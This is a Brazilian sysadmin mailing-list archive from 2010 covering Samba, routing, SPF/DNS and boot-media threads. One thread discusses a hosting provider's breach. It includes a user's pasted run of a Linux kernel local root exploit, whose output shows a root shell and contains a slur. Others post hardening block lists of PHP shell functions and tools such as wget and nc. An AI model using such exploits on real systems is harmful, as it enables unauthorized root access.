portanto > ocorre falha de autentica??o, ele tenta mapear como guest (nobody) e > como "nobody " n?o tem acesso ao compartilhamento em quest?o, ocorrem > os erros de acesso negado/chdir failed etc... > > Reparem na sequ?ncia que o log mostra exatamente isso (no caso a usu?ria > ? "bruna" e o compartilhamento "qualidade") > > > [2010/09/01 15:47:03, 2] lib/smbldap.c:smbldap_open_connection(788) > smbldap_open_connection: connection opened > [2010/09/01 15:47:03, 2] passdb/pdb_ldap.c:init_sam_from_ldap(541) > init_sam_from_ldap: Entry found for user: bruna > [2010/09/01 15:47:03, 2] auth/auth.c:check_ntlm_password(309) > check_ntlm_password: authentication for user [bruna] -> [bruna] -> > [bruna] succeeded > [2010/09/01 15:47:03, 1] smbd/service.c:make_connection_snum(950) > bhzquali4 (10.10.3.254) connect to service qualidade initially as user > bruna (uid=16214, gid=1050) (pid 17506) > [2010/09/01 15:47:03, 2] smbd/reply.c:reply_tcon_and_X(711) > Serving qualidade as a Dfs root > [2010/09/01 15:47:03, 2] smbd/open.c:open_file(352) > bruna opened file Atalho para qualidade em 'Samba > 3.0.23d-6-1083-SUSE-SL10.2 (bhznet)' (Q).lnk read=Yes write=No (numopen=1) > [2010/09/01 15:47:03, 2] smbd/open.c:open_file(352) > bruna opened file qualidade em 'Samba 3.0.9-2.3-SUSE (bhznet)' (Q).lnk > read=Yes write=No (numopen=2) > > > > > smbldap_open_connection: connection opened > [2010/09/01 15:10:14, 2] smbd/close.c:close_normal_file(344) > bruna closed file Reclama??es de Clientes/- Diversos -/Levantamento > causa bhz.xlsx (numopen=5) > init_sam_from_ldap: Entry found for user: bruna > [2010/09/01 15:10:14, 2] smbd/close.c:close_normal_file(344) > > < corte> > > > Aqui come?am os problemas... Depois que finaliza o compartilhamento, > por timeout e depois ? requisitado o compartilhamento novamente, o > sistema n?o consegue localizar a usu?ria para fazer re-autentica??o, > (NT_STATUS_NO_SUCH_USER) , tenta mapear para "guest" (nobody) e nesse > caso, como nobody n?o tem (e n?o pode ter) acesso a esse > compartilhamento, come?am a dar os erros .... > > > bhzquali4 (10.10.3.254) closed connection to service qualidade > [2010/09/01 15:21:19, 2] lib/smbldap.c:smbldap_open_connection(788) > smbldap_open_connection: connection opened > [2010/09/01 15:21:19, 2] smbd/reply.c:reply_tcon_and_X(711) > Serving IPC$ as a Dfs root > [2010/09/01 15:23:30, 2] smbd/process.c:timeout_processing(1394) > Closing idle connection > [2010/09/01 15:25:20, 2] lib/smbldap.c:smbldap_open_connection(788) > smbldap_open_connection: connection opened > [2010/09/01 15:25:20, 2] smbd/reply.c:reply_tcon_and_X(711) > Serving IPC$ as a Dfs root > [2010/09/01 15:26:03, 2] smbd/sesssetup.c:setup_new_vc_session(799) > setup_new_vc_session: New VC == 0, if NT4.x compatible we would close > all old resources. > [2010/09/01 15:26:03, 2] smbd/sesssetup.c:setup_new_vc_session(799) > setup_new_vc_session: New VC == 0, if NT4.x compatible we would close > all old resources. > [2010/09/01 15:26:08, 2] auth/auth.c:check_ntlm_password(319) > check_ntlm_password: Authentication for user [bruna] -> [bruna] > FAILED with error NT_STATUS_NO_SUCH_USER > [2010/09/01 15:26:08, 2] lib/smbldap.c:smbldap_open_connection(788) > smbldap_open_connection: connection opened > [2010/09/01 15:26:08, 2] smbd/reply.c:reply_tcon_and_X(711) > Serving IPC$ as a Dfs root > [2010/09/01 15:26:08, 1] smbd/service.c:make_connection_snum(950) > bhzquali4 (10.10.3.254) connect to service qualidade initially as user > nobody (uid=65534, gid=65533) (pid 4144) > [2010/09/01 15:26:08, 2] smbd/reply.c:reply_tcon_and_X(711) > Serving qualidade as a Dfs root > [2010/09/01 15:26:08, 0] smbd/service.c:set_current_service(150) > chdir (/samba/qualidade) failed > [2010/09/01 15:26:08, 0] smbd/service.c:set_current_service(150) > chdir (/samba/qualidade) failed > > > > Rejaine da Silveira Monteiro > Suporte-TI > Jamef Encomendas Urgentes > Matriz - Contagem/MG > Tel: (31) 2102-8854 > www.jamef.com.br > > > Em 27-08-2010 23:26, Paulo Henrique escreveu: > > Em 27/08/2010 15:02, Rejaine Monteiro escreveu: > >> Ol? pessoal, > >> > >> Estamos com alguns problemas depois que inserimos algumas m?quinas com > >> Windows Vista no dom?nio do SAMBA > >> > >> Conseguimos incluir as m?quinas no dom?nio sem maiores problemas. Os > >> mapeamos s?o criados pelo script de startup e s?o carregados os profiles > >> dos usu?rios, etc... > >> Por?m, volta e meia, os compartilhamentos simplesmente se perdem - > >> passando a ocorrer mensagens de 'acesso negado' (NT_STATUS_DENIED) ao > >> tentar abrir a unidade compartilhada > >> Da? o sujeito faz um logoff e login novamente e tudo volta ao normal. > >> Isso tem ocorrido com certa frequencia, mas somente nas m?quinas que > >> est?o sendo substitu?das com o Vista. > >> > >> Um outro detalhe que notei ? que desde que passamos a inserir Vista na > >> rede, o master browser do servidor SAMBA n?o consegue mais se eleger > >> (mesmo com oslevel setado para 255). > >> > >> Ocorre o erro abaixo: > >> > >> send_election_dgram: Sending election packet for workgroup DOMINIO on > >> subnet 10.10.1.106 > >> [2010/08/27 14:26:58, 2] nmbd/nmbd_elections.c:run_elections(204) > >> run_elections:>>> Won election for workgroup DOMINIO on subnet > >> 10.10.1.106<<< > >> [2010/08/27 14:26:58, 2] > >> nmbd/nmbd_become_lmb.c:become_local_master_browser(537) > >> become_local_master_browser: Starting to become a master browser for > >> workgroup DOMINIO on subnet 10.10.1.106 > >> [2010/08/27 14:27:02, 0] > >> nmbd/nmbd_nameregister.c:register_name_response(130) > >> register_name_response: server at IP 10.10.3.144 rejected our name > >> registration of DOMINIO<1d> IP 10.10.1.106 with error code 6. > >> [2010/08/27 14:27:02, 0] > >> nmbd/nmbd_become_lmb.c:become_local_master_fail2(417) > >> become_local_master_fail2: failed to register name DOMINIO<1d> on > >> subnet 10.10.1.106. Failed to become a local master browser. > >> [2010/08/27 14:27:02, 2] > >> nmbd/nmbd_become_lmb.c:unbecome_local_master_browser(280) > >> unbecome_local_master_browser: unbecoming local master for workgroup > >> DOMINIO on subnet 10.10.1.106 > >> > >> > >> No ambiente do servidor samba aqui est? um pouco desatualizado, e creio > >> que seja por isso - Mas como n?o tenho como atualizar agora, gostaria > >> de saber se algu?m por ventura tenha passado por problemas semelhante e > >> SE existe alguma forma de contornar esse problema, at? que possamos > >> atualizar o sistema. > >> > >> Desde ja agrade?o! > >> > >> __ > >> masoch-l list > >> https://eng.registro.br/mailman/listinfo/masoch-l > >> > > O Windows XP se comporta dessa maneira quando se trabalha com o Samba > > apenas como DC e utiliza mapeamentos no sistema para uma pasta no > > servidor, no qual ele ( windows xp ) a torne off-line, apos isso n?o ? > > browsered os arquivos do DC e qualquer acesso a maquina da rede ou da > > maquina a rede quando n?o retorna acesso negado, simplesmente n?o > > disp?em nenhum erro. > > Verifica se o mobsync.exe ( nome do sincronizador da microsoft no > > Windows XP ) consta entre os processos em execu??o no windows vista. > > Verifica tambem a configura??o quanto ao winbind lembro de ter lido na > > documenta??o que o winbind no windows vista ouve autera??o no seu > > comportamento. > > > > Sem mais, espero ter ajudado. > > __ > > masoch-l list > > https://eng.registro.br/mailman/listinfo/masoch-l > __ > masoch-l list > https://eng.registro.br/mailman/listinfo/masoch-l > -- Carlos Eduardo Tavares Terra Red Hat Certified Engineer Consultor em Administra??o de Redes Linux GNU/Linux #413291 [http://counter.li.org] From eduardo.terra at gmail.com Wed Sep 22 12:13:56 2010 From: eduardo.terra at gmail.com (Carlos Eduardo Tavares Terra) Date: Wed, 22 Sep 2010 12:13:56 -0300 Subject: [MASOCH-L] Help Roteamento no Gateway In-Reply-To: References: Message-ID: Willen, tenta criar uma rota default, com m?trica de menor peso, tamb?m pelo link1. Veja se da algum resultado para voc?. Att, 2010/9/21 Willen Borges Coelho > Pessoal to precisando de ajuda com um roteamento do nosso gateway de uma > das > dmz... > > Recentemente adquirimos um link maior e redirecionei o default gw do > servidor por esse link2(que ? o link novo de maior capacidade)... > > Eu adicionei uma regra ip rule from mailserver para que esse servidor de > e-mail sempre saia pelo link1(que ? o link antigo).... agora as minhas > regras do postrouting n?o est?o funcionando( iptables -t nat -A POSTROUTING > -s $IP_INTMAIL -j SNAT --to $IP_EXTMAIL1 )...o servidor de e-mail est? > saindo com o ip real da interface do link1 do gateway...e n?o com o ip da > interface virtual que est? emulado e configurado como MX do nosso > dominio... > > > > Link1 - eth1 - antigo > > Link2 - eth2 - novo de maior capacidade > > > > O ip do MX est? configurado na eth1:1 e o roteamento default do servidor > est? saindo pelo eth2.... > > > > Quando eu mudo o default gw para o link1...o postrouting funciona > perfeitamente....o que eu preciso fazer? > > > > Atenciosamente, > > Willen Borges Coelho > Analista de Tecnologia da Informa??o > Coordenadoria de Tecnologia da Informa??o > Ifes - Instituto Federal de Educa??o, Ci?ncia e Tecnologia do Esp?rito > Santo > Campus Cachoeiro de Itapemirim > (28) 3526-9027 > > "Homens superficiais acreditam em sorte; > homens s?bios e fortes acreditam em causa e efeito." > (Ralph Waldo Emerson) > > > > __ > masoch-l list > https://eng.registro.br/mailman/listinfo/masoch-l > -- Carlos Eduardo Tavares Terra Red Hat Certified Engineer Consultor em Administra??o de Redes Linux GNU/Linux #413291 [http://counter.li.org] From rejaine at bhz.jamef.com.br Thu Sep 23 11:30:14 2010 From: rejaine at bhz.jamef.com.br (Rejaine Monteiro) Date: Thu, 23 Sep 2010 11:30:14 -0300 Subject: [MASOCH-L] PROBLEMA SPF Message-ID: <4C9B6476.2000904@bhz.jamef.com.br> Alguem a? est? tendo problemas em resolver SPF esse dominio: grupotroiano.com.br? Os e-mail desse dom?nio est?o sendo rejeitados em meu servidor de correio pela pol?tica SPF/FAIL (SPF: error in processing during lookup of grupotroiano.com.br: DNS problem) Eles possuem outro dom?nio, o troiano.com.br onde tudo funciona normalmente. Pelo nslookup, consultando no servidor DNS deles (locaweb), retorna: # nslookup -q=txt grupotroiano.com.br ns1.locaweb.com.br Server: ns1.locaweb.com.br Address: 189.126.108.2#53 Non-authoritative answer: *** Can't find grupotroiano.com.br: No answer J? o comando "host", retorna: # host -ttxt grupotroiano.com.br Host grupotroiano.com.br not found: 3(NXDOMAIN) # host -ttxt grupotroiano.com.br ns1.locaweb.com.br Using domain server: Name: ns1.locaweb.com.br Address: 189.126.108.2#53 Aliases: grupotroiano.com.br.jamef.com.br has no TXT record Estranho ? que na ultima linha acima, o *meu* dominio foi acrescentado na resposta (!?!?!) O que pode ser isso? From danton.nunes at inexo.com.br Thu Sep 23 12:03:38 2010 From: danton.nunes at inexo.com.br (Danton Nunes) Date: Thu, 23 Sep 2010 12:03:38 -0300 (BRT) Subject: [MASOCH-L] PROBLEMA SPF In-Reply-To: <4C9B6476.2000904@bhz.jamef.com.br> References: <4C9B6476.2000904@bhz.jamef.com.br> Message-ID: On Thu, 23 Sep 2010, Rejaine Monteiro wrote: > Estranho ? que na ultima linha acima, o *meu* dominio foi acrescentado > na resposta (!?!?!) > O que pode ser isso? uma cl?usula 'search' no seu /etc/resolv.conf. From rejaine at bhz.jamef.com.br Thu Sep 23 12:07:28 2010 From: rejaine at bhz.jamef.com.br (Rejaine Monteiro) Date: Thu, 23 Sep 2010 12:07:28 -0300 Subject: [MASOCH-L] PROBLEMA SPF In-Reply-To: References: <4C9B6476.2000904@bhz.jamef.com.br> Message-ID: <4C9B6D30.5030302@bhz.jamef.com.br> o search est? somente para meus dominio ( search jamef.com.br) a quest?o ? .. o SPF n?o foi publicado , at? a? ok, porque nao ? obrigatorio, mas continua ocorrendo falha.. Em 23-09-2010 12:03, Danton Nunes escreveu: > On Thu, 23 Sep 2010, Rejaine Monteiro wrote: > >> Estranho ? que na ultima linha acima, o *meu* dominio foi acrescentado >> na resposta (!?!?!) >> O que pode ser isso? > > uma cl?usula 'search' no seu /etc/resolv.conf. > __ > masoch-l list > https://eng.registro.br/mailman/listinfo/masoch-l From danton.nunes at inexo.com.br Thu Sep 23 12:11:08 2010 From: danton.nunes at inexo.com.br (Danton Nunes) Date: Thu, 23 Sep 2010 12:11:08 -0300 (BRT) Subject: [MASOCH-L] PROBLEMA SPF In-Reply-To: <4C9B6D30.5030302@bhz.jamef.com.br> References: <4C9B6476.2000904@bhz.jamef.com.br> <4C9B6D30.5030302@bhz.jamef.com.br> Message-ID: On Thu, 23 Sep 2010, Rejaine Monteiro wrote: > > o search est? somente para meus dominio ( search jamef.com.br) > a quest?o ? .. o SPF n?o foi publicado , at? a? ok, porque nao ? > obrigatorio, > mas continua ocorrendo falha.. o dom?nio inteiro falha. > host -t any grupotroiano.com.br. Host grupotroiano.com.br not found: 2(SERVFAIL) possivelmente alguma coisa errada na Locaweb, pois os servidores de nomes desse dom?nio s?o de l?. From felipe.teofilo at argohost.net Mon Sep 20 23:23:23 2010 From: felipe.teofilo at argohost.net (Felipe Teofilo) Date: Mon, 20 Sep 2010 23:23:23 -0300 Subject: [MASOCH-L] RES: Locaweb - Problemas com E-mails - Locaweb sofre ataque cracker In-Reply-To: References: Message-ID: <864A94EE-C20C-45C8-B0A5-67E5701EC691@argohost.net> mod_security no apache, e php compilado com suhosin. Felipe Te?filo - Ger?ncia ArgoHost."N?s amamos Internet" (85) 3198-3030 | www.argohost.net Seja Nosso Franqueado - www.franquiasargohost.net On 20/09/2010, at 14:17, Alexandre Gorges wrote: > No php eu desligo algumas coisas > > disable_functions > > escapeshellarg, escapeshellcmd, exec, passthru, proc_close, proc_open, shell > _exec, system, dl, popen, php_check_syntax, php_strip_whitespace, symlink, l > ink, openlog, apache_child_terminate, apache_get_modules, apache_get_version > , apache_getenv, apache_note, apache_sentenv, virtual > > > E limito o opendir para o home onde fica o site: > > open_basedir /home/sites/xxxx.com.br:/usr/share/pear > doc_root /home/sites/xxxx.com.br > > Alguma outra sugestao para o php? > > []'s > Alexandre Gorges > http://www.google.com.br/profiles/algorges > MSN/Skype: alexandre at dag.net.br > ICQ: 2031408 > > > > >> From: Egberto Monteiro >> Reply-To: Lista Masoch >> Date: Mon, 20 Sep 2010 14:10:55 -0300 >> To: Lista Masoch >> Subject: Re: [MASOCH-L] RES: Locaweb - Problemas com E-mails - Locaweb sofre >> ataque cracker >> >> O buraco ? mais embaixo, se o cara envia o arquivo j? compilado? >> >> Deve-se dificultar/impossibilitar a execu??o de arquivos arbitrarios e >> para isso existem N possibilidades. >> >> Att, >> Egberto Monteiro >> >> Em 09/20/2010 01:20 PM, Alexandre Gorges escreveu: >>> Chmod 700 /usr/bin/gcc apenas root pode usar. >>> >>> >>> []'s >>> Alexandre Gorges >>> http://www.google.com.br/profiles/algorges >>> MSN/Skype: alexandre at dag.net.br >>> ICQ: 2031408 >>> >>> >>> >>> >>>> From: "Alexandre J. Correa - Onda Internet" >>>> Organization: Onda Internet Ltda. >>>> Reply-To: Lista Masoch >>>> Date: Mon, 20 Sep 2010 12:07:16 -0300 >>>> To: Lista Masoch >>>> Subject: Re: [MASOCH-L] RES: Locaweb - Problemas com E-mails - Locaweb sofre >>>> ataque cracker >>>> >>>> mas se o php for bloqueado (extensoes/funoces de execu??o).. ja >>>> dificulta.. >>>> >>>> manter o /tmp e outras pastas de escrita "publica" com permissoes de >>>> noexec no "mount" ... >>>> >>>> >>>> Em 20/09/2010 12:03, Marcelo Coelho escreveu: >>>>> Alexandre, >>>>> >>>>> Estas medidas apenas criam alguma dificuldade, mas n?o resolvem o problema: >>>>> >>>>> - o invasor pode compilar o exploit remotamente e enviar para o servidor. >>>>> - limita??es de acesso ao wget, nc, shell_exec etc podem ser contornadas >>>>> com >>>>> scripts perl e php. >>>>> >>>>> >>>>> >>>>> On Sep 19, 2010, at 4:16 PM, Alexandre J. Correa - Onda Internet wrote: >>>>> >>>>>> Em algum ponto a LocaWeb falhou sim, mas sacrafica-la como tem sido feito, >>>>>> n?o ? "justo" (digamos assim). >>>>>> >>>>>> A falha da locaweb ? comum em v?rias empresas de hosting: >>>>>> >>>>>> - deixar os compiladores acessiveis aos usuarios. >>>>>> - alguns binarios como wget, nc, etc ficam disponiveis para execucao de >>>>>> qualquer usuario.. >>>>>> - permitir a execucao de scripts. >>>>>> - deixar algumas funcoes do php ativas (dl_open, shell_exec, etc) >>>>>> >>>>>> consegui o exploit e fiz testes em varios servidores.. >>>>>> >>>>>> [alexandre at xxx aaa]$ gcc Ac1dB1tch3z.c -m32 -o Ac1dB1tch3z >>>>>> [alexandre at xxx aaa]$ ./Ac1dB1tch3z >>>>>> Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y >>>>>> $$$ Kallsyms +r >>>>>> $$$ K3rn3l r3l3as3: >>>>>> $$$ prepare_creds->ffffffff8024b626 >>>>>> $$$ override_creds->ffffffff8024b755 >>>>>> $$$ revert_creds->ffffffff8024bbf4 >>>>>> $$$ Kernel Credentials detected >>>>>> ??? Trying the F0PPPPPPPPPPPPPPPPpppppppppp_____ m3th34d >>>>>> $$$ timer_list_fops->ffffffff806bbb80 >>>>>> $$$ w34p0n 0f ch01c3: F0PZzZzzz >>>>>> $$$ Bu1ld1ng r1ngzer0c00l sh3llc0d3 - F0PZzzZzZZ/LSD(M) m3th34d >>>>>> $$$ Prepare: m0rn1ng w0rk0ut b1tch3z >>>>>> $$$ Us1ng cr3d s3ash3llc0d3z >>>>>> $$$ 0p3n1ng th3 m4giq p0rt4l >>>>>> $$$ m4q1c p0rt4l l3n f0und: 0x7fa4543c >>>>>> $$$ 0v3r thr0w f0ps g0v3rnm3nt >>>>>> $$$ bl1ng bl1ng n1gg4 :PppPpPPpPPPpP >>>>>> sh-3.2# whoami; id >>>>>> root >>>>>> uid=0(root) gid=500(alexandre) groups=10(wheel),500(alexandre) >>>>>> >>>>>> >>>>>> a fallha ? no sistema de compatibilidade 32bits, veja que forcei o gcc >>>>>> compilar o exploit em 32bits.. >>>>>> >>>>>> em um lik ja publicado aqui, >>>>>> > (http://blog.tehospedo.com.br/novidades/2010-09-17/locaweb-nao-teve-culpa/>>>>> > ) >>>>>> tem um codigo para desligar a compatibilidade 32bits... se nao rodar >>>>>> nenhum >>>>>> software que seja 32bits.. o melhor eh desativar definitivamente a >>>>>> compatibilidade !! >>>>>> >>>>>> :) >>>>>> >>>>>> >>>>>> >>>>>> Em 19/09/2010 15:09, Marcelo M. Fleury escreveu: >>>>>>> ? muita prepot?ncia dizer que a locaweb ? amadora. Um dos servi?os da >>>>>>> locaweb foi comprometido, em quest?o de horas os servi?os foram >>>>>>> normalizados >>>>>>> e isso sim ? bom. >>>>>>> >>>>>>> Procure por dom?nios de grandes provedores aqui: >>>>>>> http://www.zone-h.com/archive >>>>>>> >>>>>>> terra, uol... todos j? foram vitimas. O que a locaweb passou, qualquer um >>>>>>> pode passar, tal como j? aconteceu com nasa, m$ e etc(e estamos falando >>>>>>> apenas de ataques que se tornaram p?blicos...). >>>>>>> >>>>>>> O importante ? que eles busquem aprender com o ocorrido, e com certeza >>>>>>> isso >>>>>>> deve acontecer, elevando ainda mais a sua maturidade. >>>>>>> >>>>>>> []s >>>>>>> >>>>>>> Em 18 de setembro de 2010 17:57, Guilherme >>>>>>> Boingescreveu: >>>>>>> >>>>>>>> Roberto, >>>>>>>> >>>>>>>> Sim, a discuss?o pode ser gigante, mas a culpa, independente do que >>>>>>>> houve, >>>>>>>> ? >>>>>>>> da Locaweb, que ? a respons?vel pela hospedagem desses sites que foram >>>>>>>> 'defaceados'. >>>>>>>> >>>>>>>> N?o podemos por a culpa na RedHat, pois alem de ter sido uma escolha da >>>>>>>> pr?pria Locaweb, utilizando o kernel deles, poderia ter aplicado >>>>>>>> corre??es >>>>>>>> e >>>>>>>> m?todos de seguran?a que inibiriam qualquer tipo de exploit local a >>>>>>>> n?vel >>>>>>>> de >>>>>>>> kernel. >>>>>>>> Voc? n?o precisa dar permiss?o para o cliente rodar arquivo bin?rio >>>>>>>> algum, >>>>>>>> se tratando de plataforma web. Muito menos, garantir acesso SSH. >>>>>>>> >>>>>>>> Se a Locaweb deseja garantir, por comodidade e como um diferencial, >>>>>>>> acesso >>>>>>>> SSH aos clientes, deveria prezar primeiramente pela seguran?a dos >>>>>>>> servidores, para depois sim, tomar um passo deste. >>>>>>>> De qualquer forma, ? poss?vel manter seu sistema seguro, independente de >>>>>>>> prover o acesso SSH aos clientes ou n?o. >>>>>>>> >>>>>>>> Essa historia se resume em amadorismo. >>>>>>>> >>>>>>>> 2010/9/18 Roberto Bert? >>>>>>>> >>>>>>>>> Ola Guilherme, >>>>>>>>> >>>>>>>>> Pelos horarios que aconteceram os eventos e as informacoes no twitter. >>>>>>>> Pode >>>>>>>>> ter sido outra coisa, mas duvido muito. >>>>>>>>> >>>>>>>>> Olha, a discussao de quem ? a culpa ? gigante. Podemos por a culpa no >>>>>>>>> pessoal que escreveu o codigo do kernel, podemos por a culpa na redhat >>>>>>>> por >>>>>>>>> nao ter auditado, podemos por a culpa nos pesquisadores que descobriram >>>>>>>>> a >>>>>>>>> falha, ou nos que divulgaram a falha na internet junto com o exploit, >>>>>>>>> ou >>>>>>>>> at? >>>>>>>>> mesmo nos legisladores do mundo todo por nao termos leis que criem um >>>>>>>>> metodo >>>>>>>>> seguro de divulgar falhas de seguranca primeiro para as empresas que >>>>>>>> podem >>>>>>>>> corrigir e depois abertamente. Enfim... ? enorme mesmo a discussao. >>>>>>>>> >>>>>>>>> Nao ? bug de chroot de ftp. >>>>>>>>> >>>>>>>>> Em ambiente de hospedagem voce da acesso aos clientes a SSH e tambem a >>>>>>>>> execucao de comados, porque tem php, perl, etc. Entao bastava subir um >>>>>>>>> binario compilado e executar ele e voce virava root. Eu reproduzi isso >>>>>>>> num >>>>>>>>> ambiente de testes. >>>>>>>>> >>>>>>>>> >>>>>>>>> >>>>>>>>> 2010/9/18 Guilherme Boing >>>>>>>>> >>>>>>>>>> Desculpe, mas, baseado em quais fatos voc? relaciona o exploit '0day' >>>>>>>> que >>>>>>>>>> foi publicado com o acontecido na Locaweb ? >>>>>>>>>> >>>>>>>>>> E tamb?m, como voc? me diz que a Locaweb n?o teve culpa ? A culpa ? de >>>>>>>>>> quem, >>>>>>>>>> dos usu?rios ? >>>>>>>>>> Uma falha no kernel n?o garante acesso privilegiado algum, se o >>>>>>>>>> sistema >>>>>>>>> for >>>>>>>>>> bem protegido e bem administrado. >>>>>>>>>> >>>>>>>>>> Pra come?o de conversa, nem deveria ser poss?vel tal exploit ser >>>>>>>>> executado >>>>>>>>>> em um ambiente de webhosting, ainda mais, em cima de um usu?rio web. >>>>>>>>>> >>>>>>>>>> Sendo um bug de chroot de ftp, um exploit local que elevou os >>>>>>>> privil?gios >>>>>>>>>> do >>>>>>>>>> invasor, ou qualquer outra coisa, a Locaweb ? respons?vel e culpada >>>>>>>> pelo >>>>>>>>>> ocorrido, pois era de sua responsabilidade, manter o sistema tanto >>>>>>>>>> atualizado como bem protegido. >>>>>>>>>> >>>>>>>>>> 2010/9/18 Roberto Bert? >>>>>>>>>> >>>>>>>>>>> Viu pessoal, aproveito para divulgar o workaround e a falha, na >>>>>>>> segunda >>>>>>>>>>> parte do artigo tem info de como proteger. Foi bem grave mesmo >>>>>>>>>>> >>>>>>>> > http://blog.tehospedo.com.br/novidades/2010-09-17/locaweb-nao-teve-culpa>>>>>>> > / >>>>>>>>>>> < >>>>>>>>>>> >>>>>>>> http://blog.tehospedo.com.br/novidades/2010-09-17/locaweb-nao-teve-culpa >>>>>>>> /> >>>>>>>>> __ >>>>>>>>> masoch-l list >>>>>>>>> https://eng.registro.br/mailman/listinfo/masoch-l >>>>>>>>> >>>>>>>> __ >>>>>>>> masoch-l list >>>>>>>> https://eng.registro.br/mailman/listinfo/masoch-l >>>>>>>> >>>>>> -- >>>>>> Sds. >>>>>> >>>>>> Alexandre Jeronimo Correa >>>>>> S?cio-Administrador >>>>>> >>>>>> Onda Internet >>>>>> www.onda.net.br >>>>>> >>>>>> IPV6 Ready ! >>>>>> www.ipv6.onda.net.br >>>>>> >>>>>> __ >>>>>> masoch-l list >>>>>> https://eng.registro.br/mailman/listinfo/masoch-l >>>>>> >>>>> __ >>>>> masoch-l list >>>>> https://eng.registro.br/mailman/listinfo/masoch-l >>>>> >>>> >>>> -- >>>> Sds. >>>> >>>> Alexandre Jeronimo Correa >>>> S?cio-Administrador >>>> >>>> Onda Internet >>>> www.onda.net.br >>>> >>>> IPV6 Ready ! >>>> www.ipv6.onda.net.br >>>> >>>> __ >>>> masoch-l list >>>> https://eng.registro.br/mailman/listinfo/masoch-l >>> >>> __ >>> masoch-l list >>> https://eng.registro.br/mailman/listinfo/masoch-l >> >> __ >> masoch-l list >> https://eng.registro.br/mailman/listinfo/masoch-l > > > __ > masoch-l list > https://eng.registro.br/mailman/listinfo/masoch-l From gustkiller at gmail.com Thu Sep 30 21:28:04 2010 From: gustkiller at gmail.com (Gustavo Santos) Date: Thu, 30 Sep 2010 21:28:04 -0300 Subject: [MASOCH-L] Pendrive USB ou Compact Flash para Roteador Linux? Message-ID: Qual o mais confi?vel? -- Gustavo Santos Analista de Redes -Tecn?logo em Redes de Computadores -P?s Graduando em Redes de Computadores e Telecomunica??es -Cisco Certified Network Associate -Juniper Certified Internet Associate - ER -Mikrotik Certified Consultant From danton.nunes at inexo.com.br Thu Sep 30 21:33:19 2010 From: danton.nunes at inexo.com.br (Danton Nunes) Date: Thu, 30 Sep 2010 21:33:19 -0300 (BRT) Subject: [MASOCH-L] Pendrive USB ou Compact Flash para Roteador Linux? In-Reply-To: References: Message-ID: On Thu, 30 Sep 2010, Gustavo Santos wrote: > Qual o mais confi?vel? > > tantufas. as v?sceras de ambos s?o mais ou menos a mesma coisa. o contato do CF me parece melhor, mas n?o o suficiente para ser decisivo. From gustkiller at gmail.com Thu Sep 30 21:36:20 2010 From: gustkiller at gmail.com (Gustavo Santos) Date: Thu, 30 Sep 2010 21:36:20 -0300 Subject: [MASOCH-L] Pendrive USB ou Compact Flash para Roteador Linux? In-Reply-To: References: Message-ID: O servidor tem um slot usb interno exatamente para a finalidade de rodar um SO nele. Entre USB e um HD sem possibilidade de fazer RAID. O Flash ganha correto? Em 30 de setembro de 2010 21:33, Danton Nunes escreveu: > On Thu, 30 Sep 2010, Gustavo Santos wrote: > > Qual o mais confi?vel? >> >> >> > tantufas. as v?sceras de ambos s?o mais ou menos a mesma coisa. o contato > do CF me parece melhor, mas n?o o suficiente para ser decisivo. > __ > masoch-l list > https://eng.registro.br/mailman/listinfo/masoch-l > -- Gustavo Santos Analista de Redes -Tecn?logo em Redes de Computadores -P?s Graduando em Redes de Computadores e Telecomunica??es -Cisco Certified Network Associate -Juniper Certified Internet Associate - ER -Mikrotik Certified Consultant From rafael at moebius.com.br Thu Sep 30 22:10:15 2010 From: rafael at moebius.com.br (rafael at moebius.com.br) Date: Thu, 30 Sep 2010 22:10:15 -0300 Subject: [MASOCH-L] Pendrive USB ou Compact Flash para Roteador Linux? In-Reply-To: References: Message-ID: <20100930221015.n7rlwr2wf4o84cs8@webmail.moebius.com.br> O compact flash ? infinitamente melhor....depois de 10 boots por pico de luz o pendrive vai pra conta... ----- Mensagem de danton.nunes at inexo.com.br --------- Data: Thu, 30 Sep 2010 21:33:19 -0300 (BRT) De: Danton Nunes Endere?o para Resposta (Reply-To): "Mail Aid and Succor, On-line Comfort and Help" Assunto: Re: [MASOCH-L] Pendrive USB ou Compact Flash para Roteador Linux? Para: "Mail Aid and Succor, On-line Comfort and Help" > On Thu, 30 Sep 2010, Gustavo Santos wrote: > >> Qual o mais confi?vel? >> >> > > tantufas. as v?sceras de ambos s?o mais ou menos a mesma coisa. o > contato do CF me parece melhor, mas n?o o suficiente para ser > decisivo. > __ > masoch-l list > https://eng.registro.br/mailman/listinfo/masoch-l ----- Final da mensagem de danton.nunes at inexo.com.br ----- From MBORBA at trf3.jus.br Thu Sep 30 23:42:16 2010 From: MBORBA at trf3.jus.br (MARLON BORBA) Date: Thu, 30 Sep 2010 23:42:16 -0300 Subject: [MASOCH-L] Pendrive USB ou Compact Flash para Roteador Linux? Message-ID: <4CA52058020000460003A67F@d-gws03.jfsp.gov.br> suponho por?m que as capacidades do pendrive sejam maiores e al?m disso este seja mais barato, n?o? Abra?os, Marlon Borba, CISSP, APC DataCenter Associate T?cnico Judici?rio ? Seguran?a da Informa??o IPv6 Evangelist ? Moreq-Jus Evangelist Comiss?o Local de Resposta a Incidentes - CLRI TRF 3 Regi?o (11) 3012-2030 (VoIP) -- Governing for enterprise security means viewing adequate security as a non-negotiable requirement of being in business. Carnegie-Mellon CERT -- >>> 30/09/10 22:10 >>> O compact flash ? infinitamente melhor....depois de 10 boots por pico de luz o pendrive vai pra conta... [...] From rubensk at gmail.com Thu Sep 30 23:48:00 2010 From: rubensk at gmail.com (Rubens Kuhl) Date: Thu, 30 Sep 2010 23:48:00 -0300 Subject: [MASOCH-L] Pendrive USB ou Compact Flash para Roteador Linux? In-Reply-To: References: Message-ID: 2010/9/30 Gustavo Santos : > Qual o mais confi?vel? CF mais confi?vel que pen-drive, via de regra. Cuidado que se voc? for usar algum sistema com licenciamento pela m?dia, tipo o Mikrotik, ele pode n?o gostar de pen-drive... ou a sua motherboard n?o gostar de CF (apesar de j? existir CF-SATA agora). ? o tipo de coisa a testar antes de colocar um servidor desses no SEDEX. >O servidor tem um slot usb interno exatamente para a finalidade de rodar um >SO nele. Entre USB e um HD sem possibilidade de fazer RAID. O Flash ganha >correto? O Flash ganha se a taxa de escrita for baixa. Se voc? deixar um /var montado l?, isso pode deixar de ser verdade. Rubens From leolistas at solutti.com.br Thu Sep 30 23:55:25 2010 From: leolistas at solutti.com.br (Leonardo Rodrigues) Date: Thu, 30 Sep 2010 23:55:25 -0300 Subject: [MASOCH-L] Pendrive USB ou Compact Flash para Roteador Linux? In-Reply-To: 